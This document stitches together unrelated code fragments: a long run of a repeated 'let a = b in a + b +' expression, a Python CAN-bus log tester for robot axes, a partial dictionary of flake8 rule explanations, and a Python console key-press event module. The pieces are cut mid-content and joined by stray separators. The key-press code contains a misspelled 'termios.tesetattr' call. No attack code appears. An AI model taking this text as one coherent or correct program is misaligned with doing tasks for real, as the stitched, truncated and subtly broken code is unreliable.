let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b | |
#!/usr/bin/env python
# author: d.koch
# coding: utf-8
# naming: pep-0008
# typing: pep-0484
# docstring: pep-0257
# indentation: tabulation
""" canp_test.py
Simple CAN interface tester
"""
# --- IMPORT ---
# Standard libraries (installed with python)
import asyncio
#import atexit
#import json
#import logging
import os
#import random
#import re
import sys
#import time
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
#from math import cos, sin
#from typing import Any
#from typing import Callable
#from typing import Dict
from typing import List
#from typing import Optional
#from typing import Union
# . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
# External libraries (installed with pip, conda, setup.py, ...)
# python3 -m pip install --upgrade similaritymeasures
import similaritymeasures
# python3 -m pip install --upgrade numpy
import numpy as np
# . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
# Included libraries (this module, local files)
# canp_conv : data type conversion
# canp_enum : enum values
# canp_path : path parser
# canp_logs : logs logger
# canp_args : args dispatcher
# canp_card : card level (selection of the adapter and its speed)
# canp_chan : channel splitter (redirect frame on the right node)
# canp_node : node manager (most of the work is done there)
# canp_conf : configuration objects (from EDS/DCF file)
from canp_card import canp_card
from canp_card import CANP_CARD__BAUD_500K
from canp_card import CANP_CARD__RE_FRAME
from canp_enum import CANP_ENUM__APP_NAME
from canp_enum import CANP_ENUM__HEAD_LIST
from canp_enum import CANP_ENUM__HEAD_MAIN
from canp_enum import CANP_ENUM__HEAD_NAME
from canp_enum import CANP_ENUM__STR_SPACE
from canp_args import canp_args
from canp_logs import canp_logs
from canp_view_mpl import canp_view_mpl
from canp_view_dpg import canp_view_dpg
from canp_view_enaml import canp_view_enaml
from canp_view_flexx import canp_view_flexx
# --- GLOBAL ---
# Local settings (might be present in other files yet with different values)
ASYNC_RUN = asyncio.run
ASYNC_LOOP = asyncio.get_event_loop()
ASLEEP = asyncio.sleep
# Card (see can.interfaces.BACKENDS)
CANP_TEST__CARD = "neovi"
# Channel
CANP_TEST__CHAN = 2
# Nodes
CANP_TEST__NODE_AXIS_X = 1
CANP_TEST__NODE_AXIS_Y = 2
CANP_TEST__NODE_AXIS_Z = 3
CANP_TEST__NODE_GRIP = 4
# Configuration files
# /!\ Use v1.0, not v1.2 despite looking more recent
CANP_TEST__FILE_EDS = "PAC-P3_v1.0.eds"
CANP_TEST__FILE_DCF = "carteGripper_config_01.dcf"
# Log file (beware of format, must be supported to be parser correctly)
CANP_TEST__FILE_LOG = "python_can.logger_c_2_all_axis_rot.log"
#CANP_TEST__FILE_LOG = "cycle U 8u20 9-16-2021 11-58-56 am.asc"
# Array indexes
CANP_TEST__ARR_TMP = 0
CANP_TEST__ARR_POS = 1
# Can object index for Position (depends on configuration file because PDO)
CANP_TEST__POS_OBJ = 0x6064
CANP_TEST__POS_SUB = 0
# Setting global wide logger (used in sub classes as well, hopefully)
g_logs = canp_logs.logger(CANP_ENUM__APP_NAME)
# --- CLASS ---
# --- MAIN ---
def __main__(i_list_args: List = []):
""" Basic self test (debugging)
"""
global g_logs
if False:
# Display log file (line by line)
g_logs.debug("--- CAN LOG DISPLAY ---")
with open(str(CANP_TEST__FILE_LOG)) as obj_file_:
for num_line_, str_line_ in enumerate(obj_file_, 1):
str_line_.strip()
# '(142.844095) 2 381#6C4E0000FEFFFFFF'
g_logs.debug(f"{num_line_}:'{str_line_}'")
l_list_line = CANP_CARD__RE_FRAME.split(str_line_)
l_list_line = CANP_ENUM__STR_SPACE.join(l_list_line).split()
g_logs.debug(f"{num_line_}:{l_list_line}\n")
# ['142.844095', '2', '381', '6C4E0000FEFFFFFF']
else:
# Creating "card" object (to connect to CAN or parse LOG files)
l_obj_can = canp_card()
# Configure channel and its nodes (using EDS/DCF description file)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_AXIS_X,
i_str_file = CANP_TEST__FILE_EDS)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_AXIS_Y,
i_str_file = CANP_TEST__FILE_EDS)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_AXIS_Z,
i_str_file = CANP_TEST__FILE_EDS)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_GRIP,
i_str_file = CANP_TEST__FILE_DCF)
# Select the data source (LOG file or real time CAN data)
if True:
g_logs.debug("--- CAN LOG PARSE ---")
l_obj_can.log_parse(
i_str_file = CANP_TEST__FILE_LOG)
else:
g_logs.debug("--- CAN BUS PARSE ---")
l_obj_can.can_parse(
i_str_card = CANP_TEST__CARD,
i_str_chan = str(CANP_TEST__CHAN),
i_int_baud = CANP_CARD__BAUD_500K,
i_int_count = 100000)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# The hierarchy is as follow :
# CARD object
# CHAN object
# NODE object
# OBJS dict (all sub registers)
# SUBS dict
# DATA (last data stored)
# LIST (all data stored in (time, data) format)
g_logs.debug("Testing...")
#l_obj_can.m_dict_chans[2].m_dict_nodes[2].m_dict_objs[0x6064][0]
#l_obj_can[2][2][0x6064][0]
# Doing some math (rotor increment into mm)
l_float_pos_ratio = 1.0
l_float_pos_ratio = (4096 * 10) / 204
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Extracting X axis data (with numpy conversion)
l_list_x_can = l_obj_can[CANP_TEST__CHAN][CANP_TEST__NODE_AXIS_X][CANP_TEST__POS_OBJ][CANP_TEST__POS_SUB][CANP_ENUM__HEAD_LIST]
l_narr_x_can = np.zeros((len(l_list_x_can), 2))
l_narr_x_can[:, CANP_TEST__ARR_TMP] = [f[CANP_TEST__ARR_TMP] for f in l_list_x_can]
l_narr_x_can[:, CANP_TEST__ARR_POS] = [f[CANP_TEST__ARR_POS] / l_float_pos_ratio for f in l_list_x_can]
# Starting timestamp (exact or manual value)
l_float_tmp_start = l_list_x_can[0][CANP_TEST__ARR_TMP]
l_float_tmp_start = 143.0 # Time base for "reference" curve
# Offsetting time and position (plus zipping them)
l_list_x_ref_tmp = [ts + l_float_tmp_start for ts in [0.0, 6.93, 10.15, 10.8, 14.02, 53.0]]
l_list_x_ref_pos = [ps / l_float_pos_ratio for ps in [20075, 20075, 107450, 107450, 20075, 20075]]
l_zipr_x_ref = zip(l_list_x_ref_tmp, l_list_x_ref_pos)
# Converting time and position to numpy format
l_narr_x_ref = np.zeros((6, 2))
l_narr_x_ref[:, CANP_TEST__ARR_TMP] = l_list_x_ref_tmp
l_narr_x_ref[:, CANP_TEST__ARR_POS] = l_list_x_ref_pos
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Extracting Y axis data (with numpy conversion)
l_list_y_can = l_obj_can[CANP_TEST__CHAN][CANP_TEST__NODE_AXIS_Y][CANP_TEST__POS_OBJ][0][CANP_ENUM__HEAD_LIST]
l_narr_y_can = np.zeros((len(l_list_y_can), 2))
l_narr_y_can[:, CANP_TEST__ARR_TMP] = [f[CANP_TEST__ARR_TMP] for f in l_list_y_can]
l_narr_y_can[:, CANP_TEST__ARR_POS] = [f[CANP_TEST__ARR_POS] / l_float_pos_ratio for f in l_list_y_can]
# Offsetting time and position (plus zipping them)
l_list_y_ref_tmp = [ts + l_float_tmp_start for ts in [0.0, 16.15, 19.86, 20.81, 24.51, 53.0]]
l_list_y_ref_pos = [ps / l_float_pos_ratio for ps in [29050, 29050, 174300, 174300, 29050, 29050]]
l_zipr_y_ref = zip(l_list_y_ref_tmp, l_list_y_ref_pos)
# Converting time and position to numpy format
l_narr_y_ref = np.zeros((6, 2))
l_narr_y_ref[:, CANP_TEST__ARR_TMP] = l_list_y_ref_tmp
l_narr_y_ref[:, CANP_TEST__ARR_POS] = l_list_y_ref_pos
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Extracting Z axis data (with numpy conversion)
l_list_z_can = l_obj_can[CANP_TEST__CHAN][CANP_TEST__NODE_AXIS_Z][CANP_TEST__POS_OBJ][0][CANP_ENUM__HEAD_LIST]
l_narr_z_can = np.zeros((len(l_list_z_can), 2))
l_narr_z_can[:, CANP_TEST__ARR_TMP] = [f[CANP_TEST__ARR_TMP] for f in l_list_z_can]
l_narr_z_can[:, CANP_TEST__ARR_POS] = [f[CANP_TEST__ARR_POS] / l_float_pos_ratio for f in l_list_z_can]
# Offsetting time and position (plus zipping them)
l_list_z_ref_tmp = [ts + l_float_tmp_start for ts in [0.0, 26.38, 30.23, 30.71, 34.57, 53.0]]
l_list_z_ref_pos = [ps / l_float_pos_ratio for ps in [15180, 15180, 94100, 94100, 15170, 15170]]
l_zipr_z_ref = zip(l_list_z_ref_tmp, l_list_z_ref_pos)
# Converting time and position to numpy format
l_narr_z_ref = np.zeros((6, 2))
l_narr_z_ref[:, CANP_TEST__ARR_TMP] = l_list_z_ref_tmp
l_narr_z_ref[:, CANP_TEST__ARR_POS] = l_list_z_ref_pos
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Partial Curve Mapping : matches the area of a subset between the two curves
# Discrete Frechet : shortest distance in-between two curves, where you are allowed to very the speed at which you travel along each curve independently (walking dog problem)
# Area : algorithm for calculating the Area between two curves in 2D space
# Curve Length : assumes that the only true independent variable of the curves is the arc-length distance along the curve from the origin
# Dynamic Time Warping : non-metric distance between two time-series curves that has been proven useful for a variety of applications
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Calculating stats for X axis
l_float_x_pcm = similaritymeasures.pcm(l_narr_x_can, l_narr_x_ref)
l_float_x_df = similaritymeasures.frechet_dist(l_narr_x_can, l_narr_x_ref)
l_float_x_area = 0.0
#l_float_x_area = similaritymeasures.area_between_two_curves(l_narr_x_can, l_narr_x_ref)
l_float_x_cl = similaritymeasures.curve_length_measure(l_narr_x_can, l_narr_x_ref)
l_float_x_dtw, l_float_x_d = similaritymeasures.dtw(l_narr_x_can, l_narr_x_ref)
g_logs.debug(f"X :"
f" pcm={l_float_x_pcm:.3f}/0,"
f" df={l_float_x_df:.3f},"
f" area={l_float_x_area:.3f}/m2,"
f" cl={l_float_x_cl:.3f}/0,"
f" dtw={l_float_x_dtw:.3f}")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Calculating stats for Y axis
l_float_y_pcm = similaritymeasures.pcm(l_narr_y_can, l_narr_y_ref)
l_float_y_df = similaritymeasures.frechet_dist(l_narr_y_can, l_narr_y_ref)
l_float_y_area = 0.0
#l_float_y_area = similaritymeasures.area_between_two_curves(l_narr_y_can, l_narr_y_ref)
l_float_y_cl = similaritymeasures.curve_length_measure(l_narr_y_can, l_narr_y_ref)
l_float_y_dtw, l_float_y_d = similaritymeasures.dtw(l_narr_y_can, l_narr_y_ref)
g_logs.debug(f"Y :"
f" pcm={l_float_y_pcm:.3f}/0,"
f" df={l_float_y_df:.3f},"
f" area={l_float_y_area:.3f}/m2,"
f" cl={l_float_y_cl:.3f}/0,"
f" dtw={l_float_y_dtw:.3f}")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Calculating stats for Z axis
l_float_z_pcm = similaritymeasures.pcm(l_narr_z_can, l_narr_z_ref)
l_float_z_df = similaritymeasures.frechet_dist(l_narr_z_can, l_narr_z_ref)
l_float_z_area = 0.0
#l_float_z_area = similaritymeasures.area_between_two_curves(l_narr_z_can, l_narr_z_ref)
l_float_z_cl = similaritymeasures.curve_length_measure(l_narr_z_can, l_narr_z_ref)
l_float_z_dtw, l_float_z_d = similaritymeasures.dtw(l_narr_z_can, l_narr_z_ref)
g_logs.debug(f"Z :"
f" pcm={l_float_z_pcm:.3f}/0,"
f" df={l_float_z_df:.3f},"
f" area={l_float_z_area:.3f}/m2,"
f" cl={l_float_z_cl:.3f}/0,"
f" dtw={l_float_z_dtw:.3f}")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if False:
# Display data in matplotlib window
canp_view_mpl.display([
l_narr_x_can, l_narr_x_ref,
l_narr_y_can, l_narr_y_ref,
l_narr_z_can, l_narr_z_ref],
CANP_TEST__ARR_TMP,
CANP_TEST__ARR_POS,)
print("canp_view_mpl done")
if False:
# Display data in DearPyGui (0.6.x) window
canp_view_dpg.display([
# | |
be ‘not in’",
"title_templated": False,
"title": "When testing whether or not something is in an object use the form `x not in the_object` instead of `not x in the_object`.",
"solution": "Use the form `not x in the_object` instead of `x not in the_object`.",
"explanation": "This improves readability of your code as it reads more naturally."
},
"E714": {
"original_message": "test for object identity should be ‘is not’",
"title_templated": False,
"title": "When testing for object identity use the form `x is not None` rather than `not x is None`.",
"solution": "Use the form `x is not None` rather than `not x is None`.",
"explanation": "This improves readability of your code as it reads more naturally."
},
"E721": {
"original_message": "do not compare types, use ‘isinstance()’",
"title_templated": False,
"title": "You should compare an objects type by using `isinstance()` instead of `==`. This is because `isinstance` can handle subclasses as well.",
"solution": "Use `if isinstance(dog, Animal)` instead of `if type(dog) == Animal`.",
"explanation": ""
},
"E722": {
"original_message": "do not use bare except, specify exception instead",
"title_templated": False,
"title": "Except block is calling all exceptions, instead it should catch a specific exception.",
# TODO: Add a simple multi-except example
"solution": "Add the specific exception the block is expected to catch, you may need to use multiple `except` blocks if you were catching multiple exceptions.",
"explanation": "This helps other to know exactly what the `except` is expected to catch."
},
"E731": {
"original_message": "do not assign a lambda expression, use a def",
"title_templated": False,
"title": "Line assigns a lambda expression instead of defining it as a function using `def`.",
"solution": "Define the line as a function using `def`.",
"explanation": "The primary reason for this is debugging. Lambdas show as `<lambda>` in tracebacks, where functions will display the function’s name."
},
"E741": {
"original_message": "do not use variables named `l`, `O`, or `I`",
"title_templated": False,
"title": "Line uses one of the variables named `l`, `O`, or `I`",
"solution": "Change the names of these variables to something more descriptive.",
"explanation": "Variables named `l`, `O`, or `I` can be very hard to read. This is because the letter `I` and the letter `l` are easily confused, and the letter `O` and the number `0` can be easily confused."
},
"E742": {
"original_message": "do not define classes named `l`, `O`, or `I`",
"title_templated": False,
"title": "Line contains a class named `l`, `O`, or `I`",
"solution": "Change the names of these classes to something more descriptive.",
"explanation": "Classes named `l`, `O`, or `I` can be very hard to read. This is because the letter `I` and the letter `l` are easily confused, and the letter `O` and the number `0` can be easily confused."
},
"E743": {
"original_message": "do not define functions named `l`, `O`, or `I`",
"title_templated": False,
"title": "Line contains a function named `l`, `O`, or `I`",
"solution": "Change the names of these functions to something more descriptive.",
"explanation": "Functions named `l`, `O`, or `I` can be very hard to read. This is because the letter `I` and the letter `l` are easily confused, and the letter `O` and the number `0` can be easily confused."
},
"E999": {
"original_message": "Syntax error",
"title_templated": False,
"title": "Program failed to compile.",
"solution": "Make sure your code is working.",
"explanation": ""
},
# TODO: Continue from this point onwards with checking text and adding templating boolean
"W191": {
"original_message": "indentation contains tabs",
"title_templated": False,
"title": "Line contains tabs when only spaces are expected.",
"solution": "Replace any tabs in your indentation with spaces.",
"explanation": "Using a consistent character for whitespace makes it much easier for editors to read your file."
},
"W291": {
"original_message": "trailing whitespace",
"title_templated": False,
"title": "Line contains whitespace after the final character.",
"solution": "Remove any extra whitespace at the end of each line.",
"explanation": ""
},
"W292": {
"original_message": "no newline at end of file",
"title_templated": False,
"title": "Files should end with a newline.",
"solution": "Add a newline to the end of your file.",
"explanation": "All text files should automatically end with a new line character, but some code editors can allow you to remove it."
},
"W293": {
"original_message": "blank line contains whitespace",
"title_templated": False,
"title": "Blank lines should not contain any tabs or spaces.",
"solution": "Remove any whitespace from blank lines.",
"explanation": ""
},
"W391": {
"original_message": "blank line at end of file",
"title_templated": False,
"title": "There are either zero, two, or more than two blank lines at the end of your file.",
"solution": "Ensure there is only one blank line at the end of your file.",
"explanation": ""
},
# W503 ignored by default
# This seems contradicitng... https://lintlyci.github.io/Flake8Rules/rules/W503.html
"W503": {
"original_message": "line break before binary operator",
"title_templated": False,
"title": "Line break is before a binary operator.",
"solution": "",
"explanation": ""
},
# W504 ignored by default
# same as above https://lintlyci.github.io/Flake8Rules/rules/W504.html
"W504": {
"original_message": "line break after binary operator",
"title_templated": False,
"title": "Line break is after a binary operator.",
"solution": "",
"explanation": ""
},
# W505 ignored by default
"W505": {
"original_message": "doc line too long (82 > 79 characters)",
"title_templated": False,
"title": "Line is longer than 79 characters.",
"solution": "You should rewrite your long line of code by breaking it down across multiple lines.",
"explanation": "By making sure your lines of code are not too complicated means it's easier to understand by other people. Also by limiting the line width makes it possible to have several files open side-by-side, and works well when using code review tools that present the two versions in adjacent columns."
},
"W601": {
"original_message": ".has_key() is deprecated, use ‘in’",
"title_templated": False,
"title": "`.has_key()` was deprecated in Python 2. It is recommended to use the `in` operator instead.",
"solution": """
Use `in` instead of `.has_key()`.
For example:
```
if 8054 in postcodes:
```
""",
"explanation": ""
},
"W602": {
"original_message": "deprecated form of raising exception",
"title_templated": False,
"title": "Using `raise ExceptionType, message` is not supported.",
"solution": "Instead of using `raise ExceptionType, 'Error message'`, passing the text as a parameter to the exception, like `raise ExceptionType('Error message')`.",
"explanation": ""
},
"W603": {
"original_message": "‘<>’ is deprecated, use ‘!=’",
"title_templated": False,
"title": "`<>` has been removed in Python 3.",
"solution": "Replace any occurences of `<>` with `!=`.",
"explanation": "The `!=` is the common programming symbols for stating not equal."
},
"W604": {
"original_message": "backticks are deprecated, use ‘repr()’",
"title_templated": False,
"title": "Backticks have been removed in Python 3.",
"solution": "Use the built-in function `repr()` instead.",
"explanation": ""
},
"W605": {
"original_message": "invalid escape sequence ‘x’",
"title_templated": False,
"title": "Backslash is used to escape a character that cannot be escaped.",
"solution": "Either don't use the backslash, or check your string is correct.",
"explanation": ""
},
"W606": {
"original_message": "`async` and `await` are reserved keywords starting with Python 3.7",
"title_templated": False,
"title": "`async` and `await` are reserved names",
"solution": "Do not name variables or functions as `async` or `await`.",
"explanation": ""
},
"D100": {
"original_message": "Missing docstring in public module",
"title_templated": False,
"title": "Module (the term for the Python file) should have a docstring.",
"solution": "Add a docstring to your module.",
"explanation": """
A docstring is a special comment at the top of your module that briefly explains the purpose of the module. It should have 3 sets of quotes to start and finish the comment.
For example:
```
\"\"\"This file calculates required dietary requirements for kiwis.
```
"""
},
"D101": {
"original_message": "Missing docstring in public class",
"title_templated": False,
"title": "Class should have a docstring.",
"solution": "Add a docstring to your class.",
"explanation": """
A docstring is a special comment at the top of your class that briefly explains the purpose of the class. It should have 3 sets of quotes to start and finish the comment.
For example:
```
class Kiwi():
\"\"\"Represents a kiwi bird from New Zealand.\"\"\"
```
"""
},
"D102": {
"original_message": "Missing docstring in public | |
"""
.NET-style event system in Python
The aim of this module is to create an event system using only Python's base installation (e.g. no Anaconda, PyPy, etc.)
"""
if __name__ == "__main__":
# MAJOR +1 represents an added function.
__MAJOR = 1
# MINOR +1 represents a change in existing function(s) within the current MAJOR.
__MINOR = 0
__info = """This file contains the module 'KeyEvent', used to integrate key press events.
To use this module in another project, include this file inside the project's directory."""
print("========================================================")
print("KeyPress.py version ", __MAJOR, ".", __MINOR, sep='', end='\n\n')
print(__info)
print("========================================================\n")
input("Press enter to continue...")
#========================Imports========================
# Used by:
import os
from lib.Utils import *
from lib.EventSystem import *
#========================Common Functions========================
# no function
#========================KeyPressEvent classes: KeyPressEventArgs, _KeyPressEventListener, KeyPressEventHandler========================
class KeyPressEventArgs(EventArgs):
def __init__(self, key, key2=b'\x00', **kwargs):
EventArgs.__init__(self, **kwargs)
self.Key = key
self.Key2 = key2
if key2 == b'\x00':
self.isSpecialKey = False
else:
self.isSpecialKey = True
class KeyPressEventListener(EventListener):
def __init__(self, *subscribers):
EventListener.__init__(self, *subscribers)
def notify(self, sender, key, key2=b'\x00'):
"""
Notifies all subscribers about a key press.
Args:
sender:
key:
key2:
"""
EventListener.notify(self, sender, KeyPressEventArgs(key, key2))
class KeyPressEventHandler(EventHandler):
def __init__(self, *subscribers):
if os.name == 'nt':
self._getch = KeyPressEventHandler.__WindowsKeyPress()
else: # fallback method. Most likely os.name == 'posix'
self._getch = KeyPressEventHandler.__UnixKeyPress()
EventHandler.__init__(self, KeyPressEventListener(*subscribers))
def readkey(self, decode=False):
"""
Updates methods and functions subscribed to this event handler.
Any subscriber must implement the exact parameters: subscriber(sender, args: KeyPressEventArgs)
where parameter 'args' contains the string character mapped from the pressed key.
Args:
decode: Whether to decode the key code into the corresponding character.
"""
if os.name == 'nt':
# _getch() in Windows returns a set of two user inputs in latin1 encoding
keycodes = []
# We need to call _getch() 3 times per user key input in order to catch combination keys (e.g. Delete key).
for i in range(2):
keycodes.append(self._getch())
if keycodes[0] != KeyCodes.Null and keycodes[0] != KeyCodes.FunctionPrefix:
# If the first key code is not a prefix to a combination key, it is a normal ASCII character.
# In this instance, default the second jey code to null and do not detect key input anymore.
keycodes.insert(1, KeyCodes.Null)
break
i+=1
# Option to decode the key. Bad idea if wanting to detect function keys such as 'Esc'.
if decode:
# Updates the _KeyPressEventListener
self.Listener.notify(self, KeyCodes.tostring(keycodes[0], keycodes[1]))
elif keycodes[1] == b'\x00':
# A key which can be represented as a single Unicode character
self.Listener.notify(self, keycodes[0])
else:
# A special function key that is represented as a combination of two Unicode characters
self.Listener.notify(self, keycodes[0], keycodes[1])
else:
keycode = self._getch()
# Option to decode the key. Bad idea if wanting to detect function keys such as 'Esc'.
if decode:
keycode = keycode.decode('latin1')
# Updates the _KeyPressEventListener
self.Listener.notify(self, keycode)
class __UnixKeyPress:
"""
Credits:
http://code.activestate.com/recipes/134892/
"""
def __init__(self):
try:
import tty, sys
except ImportError as e:
WriteShell("An error occurred while importing module '", e.name,
"' for KeyPressEventHandler initialization. Does this system lack the required module?",
sep='', stderr=True, Color='error', flush=True)
def __call__(self):
try:
import sys, tty, termios
stdin_file = sys.stdin.fileno()
tty_attr = termios.tcgetattr(stdin_file)
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
except ImportError as impE:
WriteShell("An error occurred while importing module '", impE.name,
"' when calling KeyPressEventHandler. Does this system lack the required modules?",
sep='', stderr=True, Color='error', flush=True)
finally:
termios.tesetattr(stdin_file, termios.TCSADRAIN, tty_attr)
return ch
class __WindowsKeyPress:
"""
Credits:
http://code.activestate.com/recipes/134892/
"""
def __init__(self):
try:
import msvcrt
except ImportError as e:
WriteShell("An error occurred while importing module '", e.name,
"' for KeyPressEventHandler initialization. Does this system lack the required module?",
sep='', stderr=True, Color='error', flush=True)
def __call__(self):
try:
import msvcrt
return msvcrt.getch()
except ImportError as impE:
WriteShell("An error occurred while importing module '", impE.name,
"' when calling KeyPressEventHandler. Does this system lack the required module?",
sep='', stderr=True, Color='error', flush=True)
class KeyCodes:
"""
This class contains bytecodes of common unicode characters.
"""
# For special function keys, Python's msvcrt module will return this prefix, followed by the function key's bytecode
FunctionPrefix = b'\xe0'
Null = b'\x00'
Backspace = b'\x08'
BackspaceChar = b'\x7f' # For legacy purposes; deprecated
Escape = b'\x1b'
Enter = b'\n' # Ctrl + Enter/Return or Ctrl + J
Return = b'\r' # Enter/Return or Ctrl + M
Tab = b'\t' # Tab or Ctrl + I
CtrlZ = b'\x1a' # Undo
CtrlX = b'\x18' # Cut
CtrlC = b'\x03' # Copy
CtrlV = b'\x16' # Paste
CtrlB = b'\x02' # Embolden
CtrlN = b'\x0e' # New Item
CtrlM = Return
CtrlA = b'\x01' # Select All
CtrlS = b'\x13' # Save Item
CtrlD = b'\x04'
CtrlF = b'\x06' # Find
CtrlG = b'\x07'
CtrlH = b'\x08'
CtrlJ = Enter
CtrlK = b'\x0b'
CtrlL = b'\x0c'
CtrlQ = b'\x11' # Quit
CtrlW = b'\x17'
CtrlE = b'\x05' # Center
CtrlR = b'\x12'
CtrlT = b'\x14'
CtrlY = b'\x19' # Redo
CtrlU = b'\x15' # Underline
CtrlI = Tab
CtrlO = b'\x0f' # Open Item
CtrlP = b'\x10' # Print
Zero = b'0'
One = b'1'
Two = b'2'
Three = b'3'
Four = b'4'
Five = b'5'
Six = b'6'
Seven = b'7'
Eight = b'8'
Nine = b'9'
CommercialAt = b'@'
NumberSign = b'#'
DollarSign = b'$'
PercentSign = b'%'
Caret = b'^'
Ampersand = b'&'
Grave = b'`'
Tilde = b'~'
Space = b' '
ExclamationMark = b'!'
QuestionMark = b'?'
QuotationMark = b'"'
Apostrophe = b"'"
Comma = b','
Period = b'.'
Colon = b':'
Semicolon = b';'
LeftParenthesis = b'('
RightParenthesis = b')'
LeftBracket = b'['
RightBracket = b']'
LeftCurlyBracket = b'{'
RightCurlyBracket = b'}'
LeftAngleBracket = b'<'
RightAngleBracket = b'>'
Add = b'+'
Subtract = b'-'
Asterisk = b'*'
Slash = b'/'
Backslash = b'\\'
Equal = b'='
Underscore = b'_'
A = b'A'
B = b'B'
C = b'C'
D = b'D'
E = b'E'
F = b'F'
G = b'G'
H = b'H'
I = b'I'
J = b'J'
K = b'K'
L = b'L'
M = b'M'
N = b'N'
O = b'O'
P = b'P'
Q = b'Q'
R = b'R'
S = b'S'
T = b'T'
U = b'U'
V = b'V'
W = b'W'
X = b'X'
Y = b'Y'
Z = b'Z'
a = b'a'
b = b'b'
c = b'c'
d = b'd'
e = b'e'
f = b'f'
g = b'g'
h = b'h'
i = b'i'
j = b'j'
k = b'k'
l = b'l'
m = b'm'
n = b'n'
o = b'o'
p = b'p'
q = b'q'
r = b'r'
s = b's'
t = b't'
u = b'u'
v = b'v'
w = b'w'
x = b'x'
y = b'y'
z = b'z'
CombinationCharacters = {(FunctionPrefix, H) : 'ArrowUp',
(FunctionPrefix, P) : 'ArrowDown',
(FunctionPrefix, K) : 'ArrowLeft',
(FunctionPrefix, M) : 'ArrowRight',
(Null, Semicolon) : 'F1',
(Null, LeftAngleBracket) : 'F2',
(Null, Equal) : 'F3',
(Null, RightAngleBracket) : 'F4',
(Null, QuestionMark) : 'F5',
(Null, CommercialAt) : 'F6',
(Null, A) : 'F7',
(Null, B) : 'F8',
(Null, C) : 'F9',
(Null, D) : 'F10',
(FunctionPrefix, b'\x85') : 'F11',
(FunctionPrefix, b'\x86') : 'F12',
(FunctionPrefix, R) : 'Insert',
(FunctionPrefix, S) : 'Del',
(FunctionPrefix, I) : 'PageUp',
(FunctionPrefix, Q) : 'PageDown',
(FunctionPrefix, G) : 'Home',
(FunctionPrefix, O) : 'End',
(Null, CtrlC) : 'Ctrl+2'}
@staticmethod
def tostring(key1: bytes, key2: bytes=b'\x00'):
"""
Returns the string representation of
Args:
key1: The first bytecode returned from a keypress
key2: The second bytecode returned from a keypress
Returns:
"""
# Those are normal characters, simply decode to their respective string literals
if key2 == b'\x00':
return key1.decode('latin1')
else:
return KeyCodes.CombinationCharacters[(key1, key2)]
#========================Version History========================
# 1.0
"""
Initial Release
Refactored from EventSystem.
See version history from EventSystem.py
Additions
---------
-class KeyPressEventArgs implements EventArgs
-__init__(self, key, **kwargs)
-class _KeyPressEventListener implements EventListener
-__init__(self, *subscribers)
-notify(self, sender, key)
-class KeyPressEventHandler implements EventHandler
-__init__(self, *subscribers)
